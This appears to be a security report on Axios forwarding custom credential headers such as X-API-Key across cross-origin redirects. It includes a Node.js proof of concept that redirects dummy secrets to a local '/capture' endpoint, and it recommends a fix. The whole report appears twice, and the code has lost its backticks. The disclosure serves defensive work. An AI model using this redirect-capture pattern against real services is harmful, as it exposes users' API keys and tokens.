Axios removes standard sensitive headers such as Authorization during cross-origin redirects, but continues forwarding custom authentication and secret-bearing headers. In realistic application patterns where a shared Axios instance carries API credentials by default, this may lead to unintended credential exposure to the redirect destination.
Practical PoC
const axios = require('axios');
const TARGET_API = 'http://127.0.0.1:3001/redirect';
const REDIRECT_DESTINATION = 'http://127.0.0.1:3002/capture';
async function runPoC() {
const api = axios.create({
baseURL: 'http://127.0.0.1:3001',
headers: {
'X-API-Key': 'SUPER-SECRET-MASTER-KEY-2026',
'X-AWS-Token': 'ASIA-AMZ-SESSION-SECRET-12345',
'X-Internal-Secret': 'INTERNAL_ONLY_DATA',
'Authorization': 'Bearer SHOULD-BE-REMOVED'
}
});
const response = await api.get(/redirect?target=${encodeURIComponent(REDIRECT_DESTINATION)}, {
maxRedirects: 5
});
console.log(response.data.headers);
}
runPoC().catch(err => {
console.error(err.message);
});
Observed Result
[-] Preserved across cross-origin redirect: [x-api-key]
Forwarded value: SUPER-SECRET-MASTER-KEY-2026
[-] Preserved across cross-origin redirect: [x-aws-token]
Forwarded value: ASIA-AMZ-SESSION-SECRET-12345
[-] Preserved across cross-origin redirect: [x-internal-secret]
Forwarded value: INTERNAL_ONLY_DATA
[+] Removed during redirect handling: [authorization]
Impact
Applications that use shared Axios instances with default secret-bearing custom headers may unintentionally forward those credentials across cross-origin redirects. This affects non-standard but widely used authentication patterns such as API keys and internal service tokens.
Note
Comparative testing suggests similar behavior may exist in other HTTP client implementations, so this may be best treated as a hardening/security-improvement issue rather than a library-unique vulnerability.
Recommendation
Consider an option to strip non-essential or user-designated sensitive headers on cross-origin redirects, for example through a configurable sensitive-header policy.
Axios removes standard sensitive headers such as Authorization during cross-origin redirects, but continues forwarding custom authentication and secret-bearing headers. In realistic application patterns where a shared Axios instance carries API credentials by default, this may lead to unintended credential exposure to the redirect destination.
Practical PoC
const axios = require('axios');
const TARGET_API = 'http://127.0.0.1:3001/redirect';
const REDIRECT_DESTINATION = 'http://127.0.0.1:3002/capture';
async function runPoC() {
const api = axios.create({
baseURL: 'http://127.0.0.1:3001',
headers: {
'X-API-Key': 'SUPER-SECRET-MASTER-KEY-2026',
'X-AWS-Token': 'ASIA-AMZ-SESSION-SECRET-12345',
'X-Internal-Secret': 'INTERNAL_ONLY_DATA',
'Authorization': 'Bearer SHOULD-BE-REMOVED'
}
});
const response = await api.get(
/redirect?target=${encodeURIComponent(REDIRECT_DESTINATION)}, {maxRedirects: 5
});
console.log(response.data.headers);
}
runPoC().catch(err => {
console.error(err.message);
});
Observed Result
[-] Preserved across cross-origin redirect: [x-api-key]
Forwarded value: SUPER-SECRET-MASTER-KEY-2026
[-] Preserved across cross-origin redirect: [x-aws-token]
Forwarded value: ASIA-AMZ-SESSION-SECRET-12345
[-] Preserved across cross-origin redirect: [x-internal-secret]
Forwarded value: INTERNAL_ONLY_DATA
[+] Removed during redirect handling: [authorization]
Impact
Applications that use shared Axios instances with default secret-bearing custom headers may unintentionally forward those credentials across cross-origin redirects. This affects non-standard but widely used authentication patterns such as API keys and internal service tokens.
Note
Comparative testing suggests similar behavior may exist in other HTTP client implementations, so this may be best treated as a hardening/security-improvement issue rather than a library-unique vulnerability.
Recommendation
Consider an option to strip non-essential or user-designated sensitive headers on cross-origin redirects, for example through a configurable sensitive-header policy.